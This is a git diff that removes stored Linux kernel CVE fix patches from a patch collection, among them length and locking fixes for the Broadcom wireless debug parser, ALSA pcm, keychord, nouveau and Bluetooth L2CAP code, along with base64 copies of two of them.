--- a/Patches/Linux_CVEs/CVE-2017-0825/ANY/0001.patch
+++ /dev/null
@@ -1,129 +0,0 @@
-From 83366dd9ddb9337450f704ceef750a06c69df9ff Mon Sep 17 00:00:00 2001
-From: Franky Lin <franky.lin@broadcom.com>
-Date: Wed, 5 Jul 2017 18:04:55 -0700
-Subject: [PATCH] net: wireless: bcmdhd: add log trace event length check
-
-In log trace event parsing routine, add appropriate length check before
-accessing event data to prevent out of boundary memory access
-
-Bug: 37305633
-Signed-off-by: Franky Lin <franky.lin@broadcom.com>
-Change-Id: I267369957f9b8788f254d9433eb7787b75fb04bc
----
- drivers/net/wireless/bcmdhd/dhd_debug.c         | 52 +++++++++++++++++--------
- drivers/net/wireless/bcmdhd/include/event_log.h |  1 +
- 2 files changed, 37 insertions(+), 16 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_debug.c b/drivers/net/wireless/bcmdhd/dhd_debug.c
-index 3c45ced1ddc4f..70f4e2df3b752 100644
---- a/drivers/net/wireless/bcmdhd/dhd_debug.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_debug.c
-@@ -394,6 +394,12 @@ dhd_dbg_custom_evnt_handler(dhd_pub_t *dhdp, event_log_hdr_t *hdr, uint32 *data)
- 	wl_log_id.t = *data;
- 	if (wl_log_id.version != DIAG_VERSION) return BCME_VERSION;
- 
-+	/* custom event log should at least contain a wl_event_log_id_ver_t
-+	 * header and an arm cycle count
-+	 */
-+	if (hdr->count < 2)
-+		return BCME_BADLEN;
-+
- 	ts_hdr = (void *)data - sizeof(event_log_hdr_t);
- 	if (ts_hdr->tag == EVENT_LOG_TAG_TS) {
- 		ts_data = (uint32 *)ts_hdr - ts_hdr->count;
-@@ -624,7 +630,8 @@ dhd_dbg_msgtrace_log_parser(dhd_pub_t *dhdp, void *event_data,
- 	msgtrace_hdr_t *hdr;
- 	char *data;
- 	int id;
--	uint32 hdrlen = sizeof(event_log_hdr_t);
-+	const uint32 log_hdr_len = sizeof(event_log_hdr_t);
-+	uint32 log_pyld_len;
- 	static uint32 seqnum_prev = 0;
- 	event_log_hdr_t *log_hdr;
- 	bool event_type = FALSE;
-@@ -632,6 +639,13 @@ dhd_dbg_msgtrace_log_parser(dhd_pub_t *dhdp, void *event_data,
- 	dll_t list_head, *cur;
- 	loglist_item_t *log_item;
- 
-+	/* log trace event consists of
-+	 * msgtrace header
-+	 * event log block header
-+	 * event log payload
-+	 */
-+	if (datalen <= MSGTRACE_HDRLEN + EVENT_LOG_BLOCK_HDRLEN)
-+		return;
- 	hdr = (msgtrace_hdr_t *)event_data;
- 	data = (char *)event_data + MSGTRACE_HDRLEN;
- 	datalen -= MSGTRACE_HDRLEN;
-@@ -640,30 +654,36 @@ dhd_dbg_msgtrace_log_parser(dhd_pub_t *dhdp, void *event_data,
- 		return;
- 
- 	/* XXX: skip the meaningless pktlen/count and timestamp */
--	data += 8;
--	datalen -= 8;
-+	data += EVENT_LOG_BLOCK_HDRLEN;
-+	datalen -= EVENT_LOG_BLOCK_HDRLEN;
- 
- 	/* start from the end and walk through the packet */
- 	dll_init(&list_head);
--	while (datalen > 0) {
--		log_hdr = (event_log_hdr_t *)(data + datalen - hdrlen);
--		/* pratially overwritten entries */
--		if ((uint32 *)log_hdr - (uint32 *)data < log_hdr->count)
--			break;
--		/* end of frame? */
-+	while (datalen > log_hdr_len) {
-+		log_hdr = (event_log_hdr_t *)(data + datalen - log_hdr_len);
-+		/* skip zero padding at end of frame */
- 		if (log_hdr->tag == EVENT_LOG_TAG_NULL) {
--			log_hdr--;
--			datalen -= hdrlen;
-+			datalen -= log_hdr_len;
- 			continue;
- 		}
-+
-+		/* Check argument count, any event log should contain at least
-+		 * one argument (4 bytes) for arm cycle count and up to 16
-+		 * arguments
-+		 */
-+		if ((log_hdr->count == 0) || (log_hdr->count > MAX_NO_OF_ARG))
-+			break;
-+
-+		log_pyld_len = log_hdr->count * DATA_UNIT_FOR_LOG_CNT;
-+		/* log data should not cross event data boundary */
-+		if (((char *)log_hdr - data) < log_pyld_len)
-+			break;
-+
- 		/* skip 4 bytes time stamp packet */
- 		if (log_hdr->tag == EVENT_LOG_TAG_TS) {
--			datalen -= log_hdr->count * 4 + hdrlen;
--			log_hdr -= log_hdr->count + hdrlen / 4;
-+			datalen -= log_pyld_len + log_hdr_len;
- 			continue;
- 		}
--		if (log_hdr->count > MAX_NO_OF_ARG)
--			break;
- 		if (!(log_item = MALLOC(dhdp->osh, sizeof(*log_item)))) {
- 			DHD_ERROR(("%s allocating log list item failed\n",
- 				__FUNCTION__));
-@@ -671,7 +691,7 @@ dhd_dbg_msgtrace_log_parser(dhd_pub_t *dhdp, void *event_data,
- 		}
- 		log_item->hdr = log_hdr;
- 		dll_insert(&log_item->list, &list_head);
--		datalen -= (log_hdr->count * 4 + hdrlen);
-+		datalen -= (log_pyld_len + log_hdr_len);
- 	}
- 
- 	while (!dll_empty(&list_head)) {
-diff --git a/drivers/net/wireless/bcmdhd/include/event_log.h b/drivers/net/wireless/bcmdhd/include/event_log.h
-index 6f0bbc4e40ec1..3964d203d2fb9 100644
---- a/drivers/net/wireless/bcmdhd/include/event_log.h
-+++ b/drivers/net/wireless/bcmdhd/include/event_log.h
-@@ -141,6 +141,7 @@
- #define LOGSTRS_MAGIC   0x4C4F4753
- #define LOGSTRS_VERSION 0x1
- 
-+#define EVENT_LOG_BLOCK_HDRLEN		8
- 
- /*
-  * There are multiple levels of objects define here:
diff --git a/Patches/Linux_CVEs/CVE-2017-0861/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0861/3.10/0001.patch
deleted file mode 100644
index 7d72b4b9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0861/3.10/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 93533f313a1bf465ff8c33032e91b88315dcf9bf Mon Sep 17 00:00:00 2001
-From: Robb Glasser <rglasser@google.com>
-Date: Fri, 11 Aug 2017 11:33:31 -0700
-Subject: [PATCH] ALSA: pcm: prevent UAF in snd_pcm_info
-
-When the device descriptor is closed, the `substream->runtime` pointer
-is freed. But another thread may be in the ioctl handler, case
-SNDRV_CTL_IOCTL_PCM_INFO. This case calls snd_pcm_info_user() which
-calls snd_pcm_info() which accesses the now freed `substream->runtime`.
-
-Bug: 36006981
-Signed-off-by: Robb Glasser <rglasser@google.com>
-Signed-off-by: Nick Desaulniers <ndesaulniers@google.com>
-Change-Id: I445d24bc21dc0af6d9522a8daabe64969042236a
----
- sound/core/pcm.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/sound/core/pcm.c b/sound/core/pcm.c
-index 0ad1231c15372..6548b3af383fa 100644
---- a/sound/core/pcm.c
-+++ b/sound/core/pcm.c
-@@ -150,7 +150,9 @@ static int snd_pcm_control_ioctl(struct snd_card *card,
- 				err = -ENXIO;
- 				goto _error;
- 			}
-+			mutex_lock(&pcm->open_mutex);
- 			err = snd_pcm_info_user(substream, info);
-+			mutex_unlock(&pcm->open_mutex);
- 		_error:
- 			mutex_unlock(&register_mutex);
- 			return err;
diff --git a/Patches/Linux_CVEs/CVE-2017-0862/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0862/3.10/0001.patch
deleted file mode 100644
index 31c53866..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0862/3.10/0001.patch
+++ /dev/null
@@ -1,28 +0,0 @@
-From 19384322b5b51987bd6037f7a6b18a62a5d4d654 Mon Sep 17 00:00:00 2001
-From: Jianqiang Zhao <zhaojianqiang1@gmail.com>
-Date: Mon, 6 Mar 2017 16:33:42 +0800
-Subject: [PATCH] ANDROID: input: keychord: fix race condition bug
-
-Change-Id: I9c7c759c99e21cad9a7f9a09128122bf6ae11302
-Signed-off-by: Jianqiang Zhao <zhaojianqiang1@gmail.com>
-Bug: 36006779
----
- drivers/input/misc/keychord.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/input/misc/keychord.c b/drivers/input/misc/keychord.c
-index a5ea27ad0e16c..f580edf1c87ce 100644
---- a/drivers/input/misc/keychord.c
-+++ b/drivers/input/misc/keychord.c
-@@ -300,8 +300,10 @@ static ssize_t keychord_write(struct file *file, const char __user *buffer,
- 
- 	ret = input_register_handler(&kdev->input_handler);
- 	if (ret) {
--		kfree(keychords);
-+		spin_lock_irqsave(&kdev->lock, flags);
-+		kfree(kdev->keychords);
- 		kdev->keychords = 0;
-+		spin_unlock_irqrestore(&kdev->lock, flags);
- 		return ret;
- 	}
- 	kdev->registered = 1;
diff --git a/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch
deleted file mode 100644
index 51711f30..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch
+++ /dev/null
@@ -1,25 +0,0 @@
-diff --git a/drivers/gpu/drm/nouveau/nouveau_usif.c b/drivers/gpu/drm/nouveau/nouveau_usif.c
-index cb1182d..8d4fcc1 100644
---- a/drivers/gpu/drm/nouveau/nouveau_usif.c
-+++ b/drivers/gpu/drm/nouveau/nouveau_usif.c
-@@ -316,6 +316,12 @@
- 	} else
- 		goto done;
- 
-+	object = (void *)(unsigned long)argv->v0.token;
-+	if (!access_ok(VERIFY_READ, object, sizeof(struct usif_object))) {
-+		ret = -EINVAL;
-+		goto done;
-+	}
-+
- 	mutex_lock(&cli->mutex);
- 	switch (argv->v0.type) {
- 	case NVIF_IOCTL_V0_NEW:
-@@ -340,7 +346,6 @@
- 		break;
- 	}
- 	if (argv->v0.route == NVDRM_OBJECT_USIF) {
--		object = (void *)(unsigned long)argv->v0.token;
- 		argv->v0.route = object->route;
- 		argv->v0.token = object->token;
- 		if (ret == 0 && argv->v0.type == NVIF_IOCTL_V0_DEL) {
diff --git a/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch.base64
deleted file mode 100644
index 3cc718d5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0866/3.18/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L2RybS9ub3V2ZWF1L25vdXZlYXVfdXNpZi5jIGIvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbm91dmVhdV91c2lmLmMKaW5kZXggY2IxMTgyZC4uOGQ0ZmNjMSAxMDA2NDQKLS0tIGEvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbm91dmVhdV91c2lmLmMKKysrIGIvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbm91dmVhdV91c2lmLmMKQEAgLTMxNiw2ICszMTYsMTIgQEAKIAl9IGVsc2UKIAkJZ290byBkb25lOwogCisJb2JqZWN0ID0gKHZvaWQgKikodW5zaWduZWQgbG9uZylhcmd2LT52MC50b2tlbjsKKwlpZiAoIWFjY2Vzc19vayhWRVJJRllfUkVBRCwgb2JqZWN0LCBzaXplb2Yoc3RydWN0IHVzaWZfb2JqZWN0KSkpIHsKKwkJcmV0ID0gLUVJTlZBTDsKKwkJZ290byBkb25lOworCX0KKwogCW11dGV4X2xvY2soJmNsaS0+bXV0ZXgpOwogCXN3aXRjaCAoYXJndi0+djAudHlwZSkgewogCWNhc2UgTlZJRl9JT0NUTF9WMF9ORVc6CkBAIC0zNDAsNyArMzQ2LDYgQEAKIAkJYnJlYWs7CiAJfQogCWlmIChhcmd2LT52MC5yb3V0ZSA9PSBOVkRSTV9PQkpFQ1RfVVNJRikgewotCQlvYmplY3QgPSAodm9pZCAqKSh1bnNpZ25lZCBsb25nKWFyZ3YtPnYwLnRva2VuOwogCQlhcmd2LT52MC5yb3V0ZSA9IG9iamVjdC0+cm91dGU7CiAJCWFyZ3YtPnYwLnRva2VuID0gb2JqZWN0LT50b2tlbjsKIAkJaWYgKHJldCA9PSAwICYmIGFyZ3YtPnYwLnR5cGUgPT0gTlZJRl9JT0NUTF9WMF9ERUwpIHsK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch
deleted file mode 100644
index 352eafd2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch
+++ /dev/null
@@ -1,403 +0,0 @@
-From 2e073d2001f354982b777a38d931002a62395de1 Mon Sep 17 00:00:00 2001
-From: Ben Seri <ben@armis.com>
-Date: Sat, 09 Sep 2017 23:15:59 +0200
-Subject: [PATCH] Bluetooth: Properly check L2CAP config option output buffer length
-
-Validate the output buffer length for L2CAP config requests and responses
-to avoid overflowing the stack buffer used for building the option blocks.
-
-Change-Id: I7a0ff0b9dd0156c0e6383214a9c86e4ec4c0d236
-Cc: stable@vger.kernel.org
-Signed-off-by: Ben Seri <ben@armis.com>
-Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-CVE-2017-1000251
-Signed-off-by: Kevin F. Haggerty <haggertk@lineageos.org>
----
-
-diff --git a/include/net/bluetooth/l2cap.h b/include/net/bluetooth/l2cap.h
-index ef5e849..b868343 100644
---- a/include/net/bluetooth/l2cap.h
-+++ b/include/net/bluetooth/l2cap.h
-@@ -668,7 +668,7 @@
- 
- u8 l2cap_get_ident(struct l2cap_conn *conn);
- void l2cap_send_cmd(struct l2cap_conn *conn, u8 ident, u8 code, u16 len, void *data);
--int l2cap_build_conf_req(struct sock *sk, void *data);
-+int l2cap_build_conf_req(struct sock *sk, void *data, size_t data_size);
- int __l2cap_wait_ack(struct sock *sk);
- 
- struct sk_buff *l2cap_create_connless_pdu(struct sock *sk, struct msghdr *msg, size_t len);
-diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
-index af0dcba..a4ab0ff 100644
---- a/net/bluetooth/l2cap_core.c
-+++ b/net/bluetooth/l2cap_core.c
-@@ -910,7 +910,7 @@
- 
- 			l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 			l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--						l2cap_build_conf_req(sk, buf), buf);
-+						l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 			l2cap_pi(sk)->num_conf_req++;
- 		}
- 
-@@ -2892,11 +2892,14 @@
- 	return len;
- }
- 
--static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val)
-+static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val, size_t size)
- {
- 	struct l2cap_conf_opt *opt = *ptr;
- 
- 	BT_DBG("type 0x%2.2x len %d val 0x%lx", type, len, val);
-+
-+	if (size < L2CAP_CONF_OPT_SIZE + len)
-+		return;
- 
- 	opt->type = type;
- 	opt->len  = len;
-@@ -3275,12 +3278,13 @@
- 	}
- }
- 
--int l2cap_build_conf_req(struct sock *sk, void *data)
-+int l2cap_build_conf_req(struct sock *sk, void *data, size_t data_size)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_req *req = data;
- 	struct l2cap_conf_rfc rfc = { .mode = pi->mode };
- 	void *ptr = req->data;
-+	void *endptr = data + data_size;
- 
- 	BT_DBG("sk %p", sk);
- 
-@@ -3301,7 +3305,7 @@
- 
- done:
- 	if (pi->imtu != L2CAP_DEFAULT_MTU)
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu, endptr - ptr);
- 
- 	switch (pi->mode) {
- 	case L2CAP_MODE_BASIC:
-@@ -3316,7 +3320,7 @@
- 		rfc.max_pdu_size    = 0;
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--							(unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 		break;
- 
- 	case L2CAP_MODE_ERTM:
-@@ -3333,12 +3337,12 @@
- 			rfc.max_pdu_size = cpu_to_le16(pi->imtu);
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--							(unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 
- 		if ((pi->conn->feat_mask & L2CAP_FEAT_EXT_WINDOW) &&
- 			pi->extended_control) {
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2,
--					pi->tx_win);
-+					   pi->tx_win, endptr - ptr);
- 		}
- 
- 		if (pi->amp_id) {
-@@ -3346,7 +3350,7 @@
- 			struct l2cap_conf_ext_fs fs = {1, 1, 0xFFFF,
- 					0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF};
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_FS,
--				sizeof(fs), (unsigned long) &fs);
-+				sizeof(fs), (unsigned long) &fs, endptr - ptr);
- 		}
- 
- 		if (!(pi->conn->feat_mask & L2CAP_FEAT_FCS))
-@@ -3355,7 +3359,7 @@
- 		if (pi->fcs == L2CAP_FCS_NONE ||
- 				pi->conf_state & L2CAP_CONF_NO_FCS_RECV) {
- 			pi->fcs = L2CAP_FCS_NONE;
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs, endptr - ptr);
- 		}
- 		break;
- 
-@@ -3369,11 +3373,11 @@
- 			rfc.max_pdu_size = cpu_to_le16(pi->imtu);
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--							(unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 
- 		if ((pi->conn->feat_mask & L2CAP_FEAT_EXT_WINDOW) &&
- 			pi->extended_control) {
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, 0);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, 0, endptr - ptr);
- 		}
- 
- 		if (!(pi->conn->feat_mask & L2CAP_FEAT_FCS))
-@@ -3382,7 +3386,7 @@
- 		if (pi->fcs == L2CAP_FCS_NONE ||
- 				pi->conf_state & L2CAP_CONF_NO_FCS_RECV) {
- 			pi->fcs = L2CAP_FCS_NONE;
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs, endptr - ptr);
- 		}
- 		break;
- 	}
-@@ -3394,12 +3398,13 @@
- }
- 
- 
--static int l2cap_build_amp_reconf_req(struct sock *sk, void *data)
-+static int l2cap_build_amp_reconf_req(struct sock *sk, void *data, size_t data_size)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_req *req = data;
- 	struct l2cap_conf_rfc rfc = { .mode = pi->mode };
- 	void *ptr = req->data;
-+	void *endptr = data + data_size;
- 
- 	BT_DBG("sk %p", sk);
- 
-@@ -3420,7 +3425,7 @@
- 	}
- 
- 	l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--						(unsigned long) &rfc);
-+			   (unsigned long) &rfc, endptr - ptr);
- 
- 	if (pi->conn->feat_mask & L2CAP_FEAT_FCS) {
- 		/* TODO assign fcs for br/edr based on socket config option */
-@@ -3431,7 +3436,7 @@
- 		else
- 			pi->local_conf.fcs = L2CAP_FCS_CRC16;
- 
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->local_conf.fcs);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->local_conf.fcs, endptr - ptr);
- 		pi->fcs = pi->local_conf.fcs | pi->remote_conf.fcs;
- 	}
- 
-@@ -3441,11 +3446,12 @@
- 	return ptr - data;
- }
- 
--static int l2cap_parse_conf_req(struct sock *sk, void *data)
-+static int l2cap_parse_conf_req(struct sock *sk, void *data, size_t data_size)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_rsp *rsp = data;
- 	void *ptr = rsp->data;
-+	void *endptr = data + data_size;
- 	void *req = pi->conf_req;
- 	int len = pi->conf_len;
- 	int type, hint, olen;
-@@ -3563,7 +3569,8 @@
- 			return -ECONNREFUSED;
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+				   sizeof(rfc), (unsigned long) &rfc,
-+				   endptr - ptr);
- 	}
- 
- 
-@@ -3583,7 +3590,7 @@
- 			pi->omtu = mtu;
- 			pi->conf_state |= L2CAP_CONF_MTU_DONE;
- 		}
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu, endptr - ptr);
- 
- 		switch (rfc.mode) {
- 		case L2CAP_MODE_BASIC:
-@@ -3601,11 +3608,11 @@
- 			pi->conf_state |= L2CAP_CONF_MODE_DONE;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+					sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 
- 			if (pi->conf_state & L2CAP_CONF_LOCKSTEP)
- 				l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_FS,
--					sizeof(fs), (unsigned long) &fs);
-+					sizeof(fs), (unsigned long) &fs, endptr - ptr);
- 
- 			break;
- 
-@@ -3615,7 +3622,7 @@
- 			pi->conf_state |= L2CAP_CONF_MODE_DONE;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+					sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 
- 			break;
- 
-@@ -3659,11 +3666,12 @@
- 	return ptr - data;
- }
- 
--static int l2cap_parse_amp_move_reconf_req(struct sock *sk, void *data)
-+static int l2cap_parse_amp_move_reconf_req(struct sock *sk, void *data, size_t data_size)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_rsp *rsp = data;
- 	void *ptr = rsp->data;
-+	void *endptr = data + data_size;
- 	void *req = pi->conf_req;
- 	int len = pi->conf_len;
- 	int type, hint, olen;
-@@ -3750,13 +3758,13 @@
- 
- 		BT_DBG("mtu %d omtu %d", mtu, pi->omtu);
- 
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu, endptr - ptr);
- 
- 		/* Don't allow extended transmit window to change. */
- 		if (tx_win != pi->remote_tx_win) {
- 			result = L2CAP_CONF_UNACCEPT;
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2,
--					pi->remote_tx_win);
-+					pi->remote_tx_win, endptr - ptr);
- 		}
- 
- 		pi->remote_mps = rfc.max_pdu_size;
-@@ -3769,7 +3777,7 @@
- 		}
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+					sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 	}
- 
- 	if (result != L2CAP_CONF_SUCCESS)
-@@ -3788,11 +3796,12 @@
- 	return ptr - data;
- }
- 
--static int l2cap_parse_conf_rsp(struct sock *sk, void *rsp, int len, void *data, u16 *result)
-+static int l2cap_parse_conf_rsp(struct sock *sk, void *rsp, int len, void *data, size_t size, u16 *result)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_req *req = data;
- 	void *ptr = req->data;
-+	void *endptr = data + size;
- 	int type, olen;
- 	unsigned long val;
- 	struct l2cap_conf_rfc rfc;
-@@ -3815,13 +3824,13 @@
- 				pi->imtu = L2CAP_DEFAULT_MIN_MTU;
- 			} else
- 				pi->imtu = val;
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_FLUSH_TO:
- 			pi->flush_to = val;
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FLUSH_TO,
--							2, pi->flush_to);
-+							2, pi->flush_to, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_RFC:
-@@ -3835,7 +3844,7 @@
- 			pi->fcs = 0;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+					sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_EXT_WINDOW:
-@@ -3845,7 +3854,7 @@
- 				pi->tx_win = L2CAP_TX_WIN_MAX_ENHANCED;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW,
--					2, pi->tx_win);
-+					2, pi->tx_win, endptr - ptr);
- 			break;
- 
- 		default:
-@@ -4204,7 +4213,7 @@
- 		u8 buf[128];
- 		l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--					l2cap_build_conf_req(sk, buf), buf);
-+					l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 		l2cap_pi(sk)->num_conf_req++;
- 	}
- 
-@@ -4255,7 +4264,7 @@
- 		l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--					l2cap_build_conf_req(sk, req), req);
-+					l2cap_build_conf_req(sk, req, sizeof(req)), req);
- 		l2cap_pi(sk)->num_conf_req++;
- 		break;
- 
-@@ -4359,9 +4368,9 @@
- 
- 	/* Complete config. */
- 	if (!amp_move_reconf)
--		len = l2cap_parse_conf_req(sk, rspbuf);
-+		len = l2cap_parse_conf_req(sk, rspbuf, sizeof(rspbuf));
- 	else
--		len = l2cap_parse_amp_move_reconf_req(sk, rspbuf);
-+		len = l2cap_parse_amp_move_reconf_req(sk, rspbuf, sizeof(rspbuf));
- 
- 	if (len < 0) {
- 		l2cap_send_disconn_req(conn, sk, ECONNRESET);
-@@ -4410,7 +4419,7 @@
- 		u8 buf[64];
- 		l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--					l2cap_build_conf_req(sk, buf), buf);
-+					l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 		l2cap_pi(sk)->num_conf_req++;
- 	}
- 
-@@ -4506,7 +4515,7 @@
- 			/* throw out any old stored conf requests */
- 			result = L2CAP_CONF_SUCCESS;
- 			len = l2cap_parse_conf_rsp(sk, rsp->data,
--							len, req, &result);
-+							len, req, sizeof(req), &result);
- 			if (len < 0) {
- 				l2cap_send_disconn_req(conn, sk, ECONNRESET);
- 				goto done;
-@@ -5306,7 +5315,7 @@
- 				l2cap_send_cmd(pi->conn,
- 					l2cap_get_ident(pi->conn),
- 					L2CAP_CONF_REQ,
--					l2cap_build_conf_req(sk, buf), buf);
-+					l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 				l2cap_pi(sk)->num_conf_req++;
- 			}
- 		} else {
-@@ -6870,7 +6879,7 @@
- 	pi = l2cap_pi(sk);
- 
- 	l2cap_send_cmd(pi->conn, l2cap_get_ident(pi->conn), L2CAP_CONF_REQ,
--				l2cap_build_amp_reconf_req(sk, buf), buf);
-+				l2cap_build_amp_reconf_req(sk, buf, sizeof(buf)), buf);
- 	return err;
- }
- 
-diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
-index 6e229d1..aa17999 100644
---- a/net/bluetooth/l2cap_sock.c
-+++ b/net/bluetooth/l2cap_sock.c
-@@ -1031,7 +1031,7 @@
- 
- 		l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--				l2cap_build_conf_req(sk, buf), buf);
-+				l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 		l2cap_pi(sk)->num_conf_req++;
- 
- 		release_sock(sk);
diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch.base64
deleted file mode 100644
index a84e7f2a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000251/3.0/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
